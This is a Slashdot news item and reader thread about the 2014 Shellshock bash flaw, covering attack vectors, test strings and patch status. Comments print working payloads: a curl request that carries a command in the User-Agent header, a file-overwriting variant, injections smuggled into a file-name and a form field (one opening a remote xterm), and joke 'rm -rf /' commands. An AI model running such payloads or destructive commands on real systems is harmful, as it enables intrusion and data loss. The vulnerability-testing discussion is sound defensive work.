Remote Exploit Vulnerability Found In Bash

kdryer39 sends this news from CSO: A remotely exploitable vulnerability has been discovered by Stephane Chazelas in bash on Linux, and it is unpleasant. The vulnerability has the CVE identifier CVE-2014-6271. This affects Debian as well as other Linux distributions. The major attack vectors that have been identified in this case are HTTP requests and CGI scripts. Another attack surface is OpenSSH through the use of AcceptEnv variables. Also through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

Dangerous

[blueshift_1]

I'm not suprised; Bash has always felt a bit dangerous...

Re:Dangerous

[twistedcubic]

This is good to know. Can you give an example of a shell which, in your opinion, feels less dangerous?

Re:Dangerous

[flyingfsck]

Awww, come on, don't bash Bash when it is down...

Re:Dangerous

ksh

Re:Dangerous

[jhantin]

ksh

Pfffft. I should have expected Korny jokes. (Ba-dum-csh.)

Re:Dangerous

[InterGuru]

Feminist nix command

man bash

Re:Dangerous

[Nethead]

Tcsh, tcsh, tcsh on you!

Re:Dangerous

[Culture20]

Bash has always felt a bit dangerous...

POUND! BANG! SLASH! bin SLASH! BASH!
#!/bin/bash

Re:Dangerous

[SumDog]

fish

Re:Dangerous

[MrKaos]

ksh

Pfffft. I should have expected Korny jokes. (Ba-dum-csh.)

sh hhhh!

Re:Dangerous

[EmperorOfCanada]

I send all my commands out to /dev/null for extra security.

Re:Dangerous

[Darinbob]

I used to think Adventure Shell was safe, until I met a grue in the dark.

Re:Dangerous

[Darinbob]

Actually it rhymes better with hash.

Though, for future reference, different countries use different words for the same thing. Even English speakers do not all use the same slang used in England. It's called the pound key because for much longer than a century the "#" was used as abbreviation for pound (avoirdupois, not sterling) in ledgers and signs in groceries. You must be new to computers I suspect to not realize the hundreds of names assigned to '#'.

Re: Dangerous

[joaommp]

he's missing the --no-preserve-root option. that's it.

Re:Dangerous

[Nethead]

sh! Don't tell them.

Re:Dangerous

[sew3521]

I wish I had mod points

Re:Dangerous

[Spugglefink]

My favorite is sudo, with the rm -rf / options. Just type sudo rm -rf / into your shell, and all your security concerns will be resolved.

True story: Shortly after switching to Linux back in '01, I did a clever demonstration for my wife, showing her how an ordinary user couldn't screw anything serious up by accident. I went to a shell and issued:

rm -rf /

Look honey, a million error messages, because my user doesn't have the right to delete any of the system files! You can't mess this up!

Just then, it iterated into /home. Oops.

Full Disclosure can be found on oss-security...

[Jizzbug]

https://marc.info/?l=oss-security&m=141157106132018&w=2

Re:Full Disclosure can be found on oss-security...

[lgw]

This is exceedingly nasty.

The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function
definition. ...

The fact that an environment variable with an arbitrary name can be used as a carrier for a malicious function definition containing trailing commands makes this vulnerability particularly severe; it enables network-based exploitation.

This is a weapons-grade exploit IMO, the sort of thing the NSA keeps hidden for when it's really needed. I'm almost surprised it wasn't suppressed.

Hmm, I wonder how many phones are valuable.

Re:Full Disclosure can be found on oss-security...

[GameboyRMH]

I'm assuming you mean "how many phones are vulnerable."

Only Nokia's N-series phones running Maemo, or Android phones with a Linux chroot are capable of running bash or sshd (without crazy hardcore modding).

Re:Full Disclosure can be found on oss-security...

[CRCulver]

Only Nokia's N-series phones running Maemo ... are capable of running bash or sshd (without crazy hardcore modding).

Installing bash on the N900 required enabling root access and intentionally installing the package. Otherwise Maemo's default shell was Busybox. Jolla's Sailfish OS, however, seems to use bash by default in its terminal application.

Re:Full Disclosure can be found on oss-security...

[bugs2squash]

Why does this have to depend on a magic string (â€) at all ? In this day and age are there not better ways to securely, out-of-band, tag information for special purposes ?

Re:Full Disclosure can be found on oss-security...

[warrax_666]

So you don't have bash installed. I'm fucking AMAZED that your bash isn't exploitable!

Re:Full Disclosure can be found on oss-security...

What they really sent: http://permalink.gmane.org/gmane.comp.security.oss.general/13852

Re:Full Disclosure can be found on oss-security...

[FatdogHaiku]

I knew something like this would happen when I changed my old Windows ME chair to dual-boot....
Damn...
I would switch to the iChair but you can only face certain selected directions when seated in it...

Re:Full Disclosure can be found on oss-security...

[marsu_k]

Just ran pacman -Syu

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

Gotta love Arch too.

Re:Full Disclosure can be found on oss-security...

[metrix007]

Sigh.

You don't have bash installed, which demonstrates absolutely NOTHING about the security of the OpenBSD bash port.

I would have thought the OpenBSD advocates were shamed into silence after their heavily audited secure by default OS was vulnerable to Heartbleed....

Re:Full Disclosure can be found on oss-security...

[exomondo]

Otherwise Maemo's default shell was Busybox.

Busybox isn't a shell. The default shell included in busybox is almquist shell (or ash) - so assuming Maemo uses the default it is ash, I can't remember - which is a bourne shell clone and I'm not sure whether ash also has this vulnerability.

Re:Full Disclosure can be found on oss-security...

[gweihir]

Really? It does require that you give the attacker control over the environment, which is a dubious thing to do in the first place. For the ssh-based attacks, you need to be at least a user on the system, which makes this a local privilege escalation only. Sure, if somebody actually uses bash as basis for CGI, this could be remotely exploitable, but there is no reason to panic.

Re:Full Disclosure can be found on oss-security...

[SumDog]

OpenBSD is so secure with it's default install because it installs absolutely nothing useful

Re:Full Disclosure can be found on oss-security...

[lgw]

Are you sure there aren't any cgi scripts on that corporate webserver that devs had to touch that one time to debug that thing?

Fortunately for the SSH case, most multi-tenanted servers these days are using VM-isolation, not user isolation, but privilege escalation exploits of one sort or another do show up as a problem on those web hosts with 10000 accounts, where someone uses the setup to push malware from their account to all the served web pages. Hopefully none of those places still give SSH access!
 

Re:Full Disclosure can be found on oss-security...

[paskie]

And now it turns out that even patched bash still carries some related security bugs. (Not really a surprise since the parser is complex and bound to, seems like running it on arbitrary environment variables really isn't the best idea...)

So, if you think you are safe,

export X='() { (a)=>\'
bash -c 'brm date'
cat brm

(N.B. the backslash is not inhibiting the apostrophe in shell syntax.)

That is, by crafter environment variables you can still overwrite files and run commands that were supposed to be parameters instead. This is still very dangerous, but thankfully the attack surface is smaller than before, for example $SSH_ORIGINAL_COMMAND is frequently not an issue anymore (at least in case of gitolite I couldn't *quickly* figure out a way to exploit this), etc.

No patch for this available yet.

Today is a fun day for linux! Think about switching your /bin/sh to dash and maybe login shell of non-interactive users too!

Re:Full Disclosure can be found on oss-security...

[subreality]

It's worse than you think. ANY CGI which calls bash without sanitizing the environment is vulnerable. For instance:

#!/usr/bin/perl
print("Content-type: text/plain\n\n");
system("bash -c ls");

but there is no reason to panic.

Start panicking.

Re:Full Disclosure can be found on oss-security...

[gweihir]

No. In addition, patching the problem takes like 1 minute.

Re:Full Disclosure can be found on oss-security...

[dbIII]

Start grepping you mean.
Oh, finished already.

Re:Full Disclosure can be found on oss-security...

[CheeseyDJ]

Hmm, I wonder how many phones are valuable.

FWIW I have a Moto G running CM11, and it is vulnerable. I checked with this test:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Someone further down reckons that this can be exploited via a DHCP request, if you are connected to a malicous AP for example. Scary stuff.

Re:Full Disclosure can be found on oss-security...

[gweihir]

It is not quite that easy. You still need to convince the web-server to pass the exploit-code into an environment variable.

Re:Full Disclosure can be found on oss-security...

[ArsenneLupin]

Just ran pacman -Syu

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

Good. And now on to the next level:

env X='() { (a)=>\' bash -c "echo /usr/bin/id"; cat echo

Re:Full Disclosure can be found on oss-security...

[jpvlsmv]

In addition, ANY CGI that calls out to the system may call something that is actually a bash script even if it doesn't look like one.

For example, xzgrep on my Ubuntu system is a bash script, so this is vulnerable:
#!/usr/bin/perl
print("Content-type: text/plain\n\n");
system("xzgrep info /var/log/mylog.xz");

Re:Full Disclosure can be found on oss-security...

[Ankh]

The CGI spec tells the Web server to make the user data available as environment variables, so e.g. Apache will put them in the environment, and environment proceses are inherited to all sub-processes, so e.g. a Perl script called via CGI and using back-ticks, my $a = `pwd`; may result in code execution.

The vulnerability doesn't apply to all ways of running code on Web servers, e.g. Java servlet APIs shoud be fine, but CGI does automatically add the HTTP headers and request paramters to the environment.

Re:Full Disclosure can be found on oss-security...

[metrix007]

Fair enough, I didn't read the thread properly. I apologize.

Re:Full Disclosure can be found on oss-security...

[Carewolf]

If you run unsanitized input from the web in your shell. YOU ARE ALREADY VULNERABLE, you don't need any other issues, you are screwed and the fix is to stop running untrusted unsanitized content on your machine.

Re:Full Disclosure can be found on oss-security...

[subreality]

Take a look at the example CGI I posted. It looks completely innocent - the command is a fixed string. It shouldn't be vulnerable, but this bug makes it so.

Re:Full Disclosure can be found on oss-security...

[Darinbob]

This mis-feature is suppressed in restricted shells (bash -r), which I suspect is a good workaround for systems that use subshells but which can't guarantee that bash is patched. Except for this description with a restricted environment, I see nothing in the man page that hints that this feature exists.

I think it's actually a side effect of having exported functions be implemented as exported environment variables. A weird feature that lets you do "export func='() { commands; };'". This means that anything can export functions to a bash subshell. It's just plain weird in my view, but I guess if the only way to communicate to a subshell is with the plain environment then that's the only way to export functions.

Re:Full Disclosure can be found on oss-security...

[Ol+Olsoc]

Start panicking.

Windows fanboi, welcome!

After updating, which neither required a reboot, nor bitched up the computer, and took very little time I decided that panicking might be a bit premature.

Your level of applicable FUD must be related to the orgasms you had when finding out that there was a vulnerableity in Linux, because you know - like 1 vulnerabiility makes up for the thousands in Windows.

Re:Full Disclosure can be found on oss-security...

[marsu_k]

You're right, that wasn't patched until today. Now the result is

/usr/bin/id
cat: echo: No such file or directory

Re:Full Disclosure can be found on oss-security...

[squiggleslash]

One thing missing in all of this is how do I exploit it? In the example you give, that's not clear.

So far as I can determine, the only time this is going to be exploited is if you have some way of manipulating the environment of the shell. I can't think of a CGI variable that's directly set to the content of something the caller has enough control over, pretty much all of them are munged, have mandatory punctuation incompatible with use as a function placed at the beginning, or are impossible to put parentheses and punctuation in.

Perhaps I'm wrong. But I'm inclined to think the entire thing is overblown for two reasons. First, the difficulty of setting the environment in the first place, and secondly the fact making system() calls, etc, is always a red flag for those checking for security holes (and is rare and usually unnecessary) because of the other potential issues with calling a program that literally has direct control over a substantial amount of your computer.

Which is not to say that, for example, the DHCP exploit that's been mentioned isn't terrifying, but even that... why the hell does the DHCPD client, by default, allow the environment to be changed via an insecure DHCP environment anyway?

Re:Full Disclosure can be found on oss-security...

[subreality]

Here's the exploit:

curl -A "() { :; }; /usr/bin/touch /tmp/vulnerable" http://127.0.0.1/test.cgi

User-Agent is copied to HTTP_USER_AGENT with no munging.

For DHCP, dhclient calls several hooks (which are usually bash scripts) when events happen. It needs to pass some information like the new domain name. Passing them via the command line creates another set of problems, so they pass them via the environment. For better or worse, it's a common convention.

So now it's the year of the Linux desktop

Because we've finally become popular enough to warrant script kiddies finding holes in our toys!
Captcha: Outcry

Re:So now it's the year of the Linux desktop

[flyingfsck]

Oh my, that's torn it. Now I'll have to switch to Minix.

Re:So now it's the year of the Linux desktop

[Penguinisto]

You do realize that bash is (nowadays) installed in damned near every *nix out there (though I think HPUX is still holding out.)

Hell, even Solaris started chucking it in at around 5.10 (Solaris 10) or so (or was it 9?), and I thought that would take an act of Congress or the Divine to happen.

(get this - you can even get bash for Windows, which might improve that OS by at least a factor of 20).

Re:So now it's the year of the Linux desktop

[CRCulver]

You do realize that bash is (nowadays) installed in damned near every *nix out there (though I think HPUX is still holding out.)

Debian and a few other distros have long since switched to Dash as their /bin/sh. Openwrt uses ash (installing bash would require intentional effort), and I assume that many *nix devices with the Busybox environment in lieu of the traditional GNU toolset also eschew bash. Sure, bash is still common out there, but thankfully not as prominent as a decade ago, and even when present it might not be exposed to an attacking surface.

Re:So now it's the year of the Linux desktop

Wrong. None of the BSDs include bash in the default install.

OpenBSD installs Korn (pdksh to be specific).
FreeBSD installs tcsh.
NetBSD installs csh or ksh

Re:So now it's the year of the Linux desktop

[gweihir]

Actually, most embedded systems have busybox instead. Bash is pretty large and complex.

Re:So now it's the year of the Linux desktop

[Fancia]

OS X provides bash preinstalled and as the login shell (since 10.4). /bin/sh is provided by bash.

Re:So now it's the year of the Linux desktop

Debian and a few other distros have long since switched to Dash as their /bin/sh.

THIS is why shell issues are a big deal.

Why not let /bin/sh be ,,, drumroll ... /bin/sh ?

By all means install all the shells you want or need, but let /bin/sh be the age old and tested bourne shell.

Re:So now it's the year of the Linux desktop

[Kythe]

Likewise, another potentially big target, DD-WRT, uses the plain Bourne shell by default, not BASH.

Re:So now it's the year of the Linux desktop

[jandrese]

I would expect that most busybox version of Bash would be safe, because they're so broken anyway that even the exploits don't work.

Re:So now it's the year of the Linux desktop

[Darinbob]

Personally I think that's kind of goofy, their reasoning at least. It's not dash because of security, but dash because they think bash is big and bulky. Which is not a great argument on a PC (a good argument for an embedded system, which Debian isn't targeting). OpenWRT makes sense because it's an embedded system, so a full featured bash is not appropriate compared to a stripped down and limited shell.

Re:So now it's the year of the Linux desktop

[CRCulver]

Actually, it was a great idea on a PC. Debian switched to dash among other reasons because the init system was a big bundle of shell scripts, and switching to a lighter shell brought immediate improvements in boot times. A similar desire for optimization (albeit one ready to junk much of the *nix tradition) led to systemd.

Re:So now it's the year of the Linux desktop

[Darinbob]

Because the original Bourne Shell was limited in many ways as a scripting environment (vastly better than csh of course). That's why people kept doing different shells. Korn Shell was a big improvement over /bin/sh, even with just scripting. And if you want just play /bin/sh, do you want the earliest version or the later versions that started adding features? Do you want /bin/sh to be Bourne Shell or do you want it to be a POSIX compliant shell?

The reason bash succeeded wildly is because it a great job of unifying both the easy of use of csh with the scripting of sh, along with the more advanced features and scripting from ksh, and it was POSIX compliant. Even better, if you invoke it as /bin/sh (which most systems do) then you get a subset of bash functionality for POSIX and sh compatibiliy (especially with respect to startup), meaning you can have portable shell scripts which can work on other shells.

Also the original /bin/sh had some licensing issues for awhile. It was AT&T intellectual property. People wanted an alternative implmentation. You can't get the "real" Bourne sh on many systems anymore, and if you could it was last updated back in 1989 I think so it's out of date with many things and not fully POSIX compliant.

Re:So now it's the year of the Linux desktop

[Darinbob]

Is this because the shell scripts were using incompatible features, or that they mistakenly used "#!/bin/bash" instead of "#!/bin/sh"? If you link bash to /bin/sh then you get a reasonably compatible shell version. But I have seen people things like "#!/bin/dash" which is just as misguided.

Re:So now it's the year of the Linux desktop

[Darinbob]

Nothing I hope uses csh or tcsh as the default shell for scripts. They may use it as a default user shell, but those are too broken for use as a scripting shell.

Not sure why there's all this bash bashing. It's a great shell, and now it has an exploit but it's being patched. Why did the bashing occur before this exploit was found, and will the apologies come out when these other shells turn out to have some exploits?

Missing in windows?

I can't find the bash icon in the Start menu. Anyone know where it is so I can remove it and avoid this exploit?

Thanks.

Re:Missing in windows?

[bragr]

Whoosh!

Re:Missing in windows?

Removing the icon doesn't remove the program.

Learn2windows.

Not sure the WHOOSH sound could get any louder here...

Re:Missing in windows?

[flyingfsck]

It's because there is no start menu in Windows anymore, you dum dum...

Re:Missing in windows?

[just_another_sean]

Seriously though is cygwin's bash vulnerable?

Looks like it is to me, haven't had a chance to check for an update yet though...

Re:Missing in windows?

[clovis]

I can't find the bash icon in the Start menu. Anyone know where it is so I can remove it and avoid this exploit?

Thanks.

You seem to have asked a question about removing the Start Menu.
Upgrade to Windows 8, but do not do the Win8.1 upgrade.
Thank you for using our products in the future.

Re:Missing in windows?

[_xeno_]

I just updated Cygwin to the latest, and yes, it's still vulnerable. (At least its bash-4.1.10-4 is, I suppose it's possible that the mirror I'm using is out of date.)

Re:Missing in windows?

[riis138]

If only there was a clippy app for Linux to make it easier to find, or maybe that search dog.

Re:Missing in windows?

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

Yes. But nobody is going to try this on your dev station. If you are using CGI, this will affect you. Many, many, many ISPs are using suphp + fcgid to run shared hosting. All of those machines are hosed.

Not to long ago, we switched to apache2-mpm-itk, so I guess we dodged the bullet on this one. Sometimes you get lucky.

Re:Missing in windows?

Um, that's not a shell that I know of. Citation needed?

Re:Missing in windows?

[Melkman]

Bash is fairly new to Windows. You'll only find it in the Windows 8 start menu.

Re:Missing in windows?

Bash is fairly new to Windows. You'll only find it in the Windows 8 start menu.

NEW TO WINDOWS?! Some people here bash Windows since forever dude.

Re:Missing in windows?

[bigfinger76]

It can.

Re:Missing in windows?

[TeknoHog]

Or an app for us 1337 Linux users to bash Windows...

Re:Missing in windows?

[smaddox]

How could this be used to remotely exploit a CGI-running Apache server? The exploiter would have to have access to the command line or write access to a CGI script, and then why use the exploit in the first place?

Re:Missing in windows?

CGI pushes HTTP headers into environment variables. So just set a header to the string that has the exploit and it will run the specified command. The specified command could download a file with wget and then run it.

Re:Missing in windows?

[hey!]

You're one up on me. I can't find the Start Menu...

Re:Missing in windows?

[klui]

Cygwin's bash 4.1.11(6) is no longer vulnerable.

Ubuntu's bash 4.3.11(1) is no longer vulnerable

Re:Missing in windows?

[countach]

Just go to a prompt and type the following command: /bin/rm -rf /

Re:Missing in windows?

[jandrese]

It's Cygwin, so Bash will be out of date regardless.

Re:Missing in windows?

[_xeno_]

True, but generally security patches get backported to whatever the current Cygwin version is.

So the vulnerability is as of now fixed with today's 4.1.12-5, which isn't the latest version of Bash.

CentOS 6.5 already has fixed package available

[astro]

sudo yum update bash

Thank you for the quick warning.

Re:CentOS 6.5 already has fixed package available

It's not fully fixed, I'd still take precaution.

Only CGI scripts affected?

So, if I undestand correctly, this affects shell scripts used for CGI; do people actually do that on what scale?

Only person I know who does this is a CS teacher in my college, onhis homepage which he has had since early 90s, are there actually commercial installations which do this, some major product with large install base ("asking this for my son")?

Re:Only CGI scripts affected?

[gurnec]

This also affects other scripting languages executed via CGI if the code spawns a shell, e.g.:

#!/bin/perl

`cat header.html`

It doesn't necessarily affect scripting languages executed via other means, e.g. mod_*

Re:Only CGI scripts affected?

[Narcocide]

Exactly. Don't pass unsanitized environment variables directly to your system shell and its not a problem. Anyone doing this with a cgi script should be slapped.

Re:Only CGI scripts affected?

[TheCarp]

Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process, well...you are already pretty compromised. If you wrote your CGI, then you are the one that compromised yourself.

That said, you know someone does this. Hell, I have had to deal with web applications written mostly in shell and did much of their processing in shell.... the only thing that really topped it for idiocy was when I dove into some perl4 code for a password change form and found this gem:

$password = $q->param('password');
if "`grep $password /usr/dict/words`" != "" {
}

No taint checking, nothing, just shell out with whatever someone put in the form. I loaded it up and added a "; touch /tmp/foo" on the end and verified there was no protection, then I found 4 more similar errors and figured that since security issues were not even why I opened the code to read it....I re-wrote it from scratch.

Re:Only CGI scripts affected?

[gurnec]

Oops, missed a "print" in there, but you get the point.

Re:Only CGI scripts affected?

CGI passes parameters through environment variables, like the request URI and user agent and everything else, to the forked process that handles the request. If the process a) is a bash script itself or b) fork-execs a child bash or /bin/sh linked to bash, without sanitizing/wiping EVERY environment variable (even ones the script doesn't use!), then it can execute arbitrary code.

Really, there needs to be a better, saner language for easily composing prewritten executables. I hate shell syntax anyway.

Re:Only CGI scripts affected?

[GameboyRMH]

I'm trying to figure out if the OpenSSH vectors are actually remote exploits or just a privilege escalation in a remote access tool. From what I understand, a user has to be authenticated to get access to any of the variables this exploit can run through.

Re:Only CGI scripts affected?

[Qzukk]

If the process a) is a bash script itself

If you're using fastcgi with a wrapper script (the recommended configuration for mod_fcgid+PHP), it's time to check the wrapper script. It should not need to be a bash script.

FCGIWrapper /usr/lib/cgi-bin/php5-wrapper .php

Re:Only CGI scripts affected?

[nedlohs]

Or a CGI script written in a some other lanaguage - like python or perl - or a binary that is on a system with bash as the default shell and which calls the system function in libc (or an equivalent) since that will execute /bin/sh.

There will be a lot of such cases - running a "mail" command or something from imagemagick and so on.

Re:Only CGI scripts affected?

[meta-monkey]

Wow, that's a special kind of stupid right there.

Re:Only CGI scripts affected?

[Anon-Admin]

Ill top that one, back in the late 90's I was hired to check out an ISP's security. I was given standard user access to the web front end.

They had a routine to un-tar/zip/etc a file. You could free form the file name so i entered

junk.tgz:xterm -display my.IP.Addr:0.0

To my surprise There was an xterm on my linux box right to their server, with full root access.

Re:Only CGI scripts affected?

[Qzukk]

When using the wrapper, apache spawns the fastcgi server on the first request if it is not already running.

Re:Only CGI scripts affected?

[BlackPignouf]

A friend of mine wrote a small web application for french conjugation, with verbiste (https://launchpad.net/ubuntu/+source/verbiste).
You type a verb, and it gives you a table like this one :
http://french.about.com/od/ver...

My verb was "avoir && whoami", and its conjugation was "root" :D

Re:Only CGI scripts affected?

[TheCarp]

If you think that is bad, you should see the parts I didn't mention, the contents of that if statement was something like "$ERRORNO = 101"

The structure of the program was very simple....it had 4 functions which were called in sequence, each one would set global variables, which would be read by the other. So, if ERRORNO was set, a whole nother function with a whole different big if statement block would then print out the error message..... which is why I opened the code up...one of the errors was wrong.

So basically, it was written in the era of perl 5, to a perl 4 standard, by someone who really liked BASIC.

Re:Only CGI scripts affected?

[geantvert]

Any setuid program that would call a bash script directly or indirectly could also be vulnerable.

I predict that in the following days hackers will find several ways to cause local privileges escalations by executing system bash scripts with customized environment variables. That could be as simple as configuring a hidden WiFi network with a customized ESSID.

 

Re:Only CGI scripts affected?

[geantvert]

On my ubuntu laptop, gunzip and zcat are Bash script.

Re:Only CGI scripts affected?

[K.+S.+Kyosuke]

Oh, there is one. It's called scsh. It's a very neat design, really, but I'm not sure you'll like its syntax either. :-) But conceptually, it's very much sane.

Re:Only CGI scripts affected?

[Uecker]

Yes. This only works if the user has an account. But he might be able to break out of a locked-down account which only runs a specific command.

Re:Only CGI scripts affected?

[ArsenneLupin]

Oh I had the same thought....I mean, by the time an "attacker" is modifying arbitrary environment variables in your process,

Which is the case on most Apache Web server configs: the client has full control over the HTTP_REFERER and HTTP_USER_AGENT variables... And the exploit in question works with any environment variable, including those 2.

Well, starting from here, you are vulnerable as soon as:

1. You have a CGI script written as a #!/bin/bash script on your system

1. You have /bin/sh symlinked to /bin/bash (used to be common in many Linux distribution), so as soon as a script calls system(), /bin/bash gets executed, along with the scripts full environment...

Re:Only CGI scripts affected?

[jeremyp]

Wouldn't it also display

grep mysekritpassword /usr/dict/words

in a ps -ef listing?

Re:Only CGI scripts affected?

[Uecker]

No, it seems that any command is run using the user's shell which might be bash.

Re:Only CGI scripts affected?

[TheCarp]

Why, yes it would, that is a good point. That was hardly the only real issue.

To add insult to injury, it would change the password by generating ldiff files, and storing them in /tmp, then running command line ldap utils on them. So in addition to that, you could likely arbitrarily set someone else's password with a little finagling.

Which, is pretty much why I just verified it could be exploited to touch a file in tmp and immediately began re-writing it.

Already fixed in Debian...

[msauve]

Linky

Re:Already fixed in Debian...

[reikae]

I wonder if Debian's default /bin/sh being dash instead of bash reduces the attack surface somewhat. Do usual configurations of web servers (and others listed in TFA) call /bin/sh or /bin/bash directly?

Hindsight is 20/20 obviously, but it makes sense to use a shell with limited features in cases where limited features are enough (especially when remotely accessible). On the other hand, now you've got two shells with potential security issues instead of just one.

Re:Already fixed in Debian...

Probably doesn't reduce the surface that much. While bash may not be the default shell, a mere #!/bin/bash at the top of ANY script down the chain, written by some poor bloke that just wanted to use [[ ]], makes the script vulnerable

Re:Already fixed in Debian...

[paskie]

On repo.or.cz, as login shell for all git user accounts we use a shell script that does some verifications, shows nice error messages etc. Thankfully, #!/bin/sh is at the top of the script and that's dash on the Debian server; otherwise, we would have been vulnerable. (Only getting into a chroot as non-root, but still...)

Re:Already fixed in Debian...

[trawg]

Fixed in wheezy (v7), but not squeeze (v6). Status: https://security-tracker.debia...

Re:Already fixed in Debian...

[nadaou]

I wonder if Debian's default /bin/sh being dash instead of bash reduces the attack surface somewhat.

Nope. I just tested dash on a Debian system which hadn't been upgraded yet. Dash is vulnerable too.

On an upgraded Debian dash is not vulnerable.

Re:Already fixed in Debian...

You probably tested with a command line that invokes bash explicitly. dash doesn't even have the feature that this exploit targets.

Re:Already fixed in Debian...

[Xylantiel]

The question would be which shell does the equivalent of system() in PHP, PERL, etc call? If the PHP or PERL code in question only uses system() to execute binaries and not scripts (which might spawn bash as you say) then it would not be vulnerable because it would be done with dash. Does anybody know which would be used? Might it depend on the form of the system() call?

Thanks god

Thanks god I am using windows.

Re:Thanks god

[LordLimecat]

Thats not a powershell vulnerability, its a piece of malware written in Powershell.

What you said would be like claiming C++ exploits because many viruses are written in C++.

Re:Thanks god

[msauve]

Your god makes you use Windows? You have a vengeful god.

Re:Thanks god

[nogginthenog]

I've got cygwin Bash installed in Windows...

Re:Thanks god

[chipschap]

I almost thought I would be disappointed and not see a "this proves Linux is bad and Windows is good post." Thank you for making my day, in a certain way.

Re:Thanks god

[iggymanz]

That's nothing, my god makes me deploy software written by developers who prefer to write the code that will run on a Linux or Unix box, on their windows desktop. Their code will therefore do things like create a directory called "C:" and make a bunch of subdirectories under that, the deepest of which contains log files. So your god is vengeful, mine is a spiteful asshole.

Re:You mean bash.org ?

[peragrin]

Bash.org is dead. Even net craft confirmed it.

Test string here:

[B5_geek]

This is the test to see if you are vulnerable:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Re:Test string here:

[TheCarp]

I have to admit, my suspicous old self had to spend a minute making sure this wasn't a fork bomb. Which, I have to say, this would be the perfect thread for if you were into that sort of mischief. In any case, yah that shouldn't worl. That really shouldn't work at all.

Re:Test string here:

[B5_geek]

=)
I too was suspicious of that fork-bomb potential. So the first time I ran it was on a test-vm.

I'm glad I am not the only paranoid one.

Re:Test string here:

[TheCarp]

> I too was suspicious of that fork-bomb potential. So the first time I ran it was on a test-vm.

lol well, as annoying as they can be, I have beaten a fork bomb before without rebooting so, I was confident enough after a quick perusal to not be afraid, especially since....come on, the function isn't even being called how can it possibly exec.....fuck

Re:Test string here:

[B5_geek]

SSH into your host.
from the bash prompt just paste the above string.

i.e.
user@host $env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

--------------------
If you see:
vulnerable
this is a test
Then you are vulnerable and need to update your system.

If all you see is:
this is a test

Then you are ok.

Re:Test string here:

[TheCarp]

I was actually just thinking another way to use this might be to have ssh pass x='() { :;}; echo vulnerable' as a variable to remote systems, that way whenever you login to a remote system, it just tells you whether it is vulnerable or not on login.

Re:Test string here:

[Spaham]

was vulnerable (on debian),
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
Just ran apt-get update and upgrade and :
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

Re:Test string here:

[chihowa]

The (ancient) version of bash that ships with OS X appears vulnerable. Luckily, as a remote exploit, only authenticated ssh sessions and cgi scripts etc expose it, so most single user workstations (of all OSs) should be safe.

If this is a bash exploit, and not a Linux exploit, why all of the focus on Linux in the article? I use bash on many different OSs.

Re:Test string here:

[OzPeter]

I just tried it on 2 different version s of OSX: 10.9.4 and 10.7.5 and confirm that they print out the "vulnerable" message

Re:Test string here:

[nogginthenog]

Interestingly Cygwin's Bash was vulnerable until I updated. Now I get the same message as you.

Re:Test string here:

[Corporate+Gadfly]

Fixed on Homebrew.

Re:Test string here:

[armanox]

That's a good question. I'm seeing my IRIX systems at home as vulnerable, but I have AcceptEnv disabled in sshd_config, and am not running web servers on them - I feel like the attack vectors are limited.

But your point is valid - ANY OS that uses Bash is a target.

Re:Test string here:

[chipschap]

Seems like a fix got pushed out pretty fast ....

Re:Test string here:

[RavenLrD20k]

*blink*
Um...please tell me this is Poe's law at work and you're not a complete idjit [sic].

Re:Test string here:

[menkhaura]

Funnily enough, Debian unstable doesn't carry a fix yet. Bash 4.3-9, as of 2014-09-24 20:42:47 UTC

Re:Test string here:

[Megane]

FWIW, I tried changing "echo vulnerable" to "whoami" and it didn't work. In fact, it segfaulted! Then I changed it to "echo `whoami`" and it worked as expected. So while it may possibly only work directly with built-in shell commands, they still get the full benefit of the command line parser and its handling of backquotes.

Re:Test string here:

[kthreadd]

Stable is priority number one, testing and unstable will follow.

Re:Test string here:

[multiplexo]

Most sshd daemons aren't configured to accept just any environment variables, they limit exposure with an AcceptEnv directive in the sshd configuration file (/etc/ssh/sshd_config on most Linux versions. This means that

env x='() { :;}; echo vulnerable' ssh some_user@some_server

probably won't work on most systems but

env LC_FRED='() { :;}; echo vulnerable ssh some_user@some_server'

will if the server is configured to accept the LC_* environment variables with the AcceptEnv directive in sshd_config.

Re:Test string here:

[smaddox]

Just installed homebrew's bash, and it's still showing as vulnerable:

$ /usr/local/bin/bash
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

What am I doing wrong?

Re:Test string here:

zsh on Mac OS X also reports "vulnerable". Does that mean it's not just a bash bug or the test string is only accurate for bash?

Re:Test string here:

[Nixoloco]

Even if it is fixed in homebrew, it's not like the system bash isn't still sitting there on your system vulnerable. Let's hope some day Apple will port in a fix to the system bash.

Re:Test string here:

[steelfood]

That's a test of bash specifically. If you want to see how vulnurable your system could potentially be, change bash to sh. Since all sorts of things will spawn shells for some purpose or another, any of them is an attack vector.

Most Linux distros (except Ubuntu and derivatives, and more recent Debian) will be vulnurable because sh symlinks to bash. But for non-Linux *NIX systems like BSD, this may or may not be true.

Patch anyway, but if you've got a vulnurable public-facing system, you may want to go over your firewall logs as well.

Re:Test string here:

I did that too, except with pdksh, and was also surprised to see a "vulnerable" report. Try something like this instead:

env x='() { :;}; echo vulnerable' zsh -c "echo this is a test"

Re:Test string here:

[Corporate+Gadfly]

Just installed homebrew's bash, and it's still showing as vulnerable:

$ /usr/local/bin/bash
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test

What am I doing wrong?

Perhaps /bin is before /usr/local/bin in your PATH.

Re:Test string here:

[mmontour]

FWIW, I tried changing "echo vulnerable" to "whoami" and it didn't work. In fact, it segfaulted!

Maybe a path issue? Try it with /usr/bin/whoami (or wherever it is on your system).

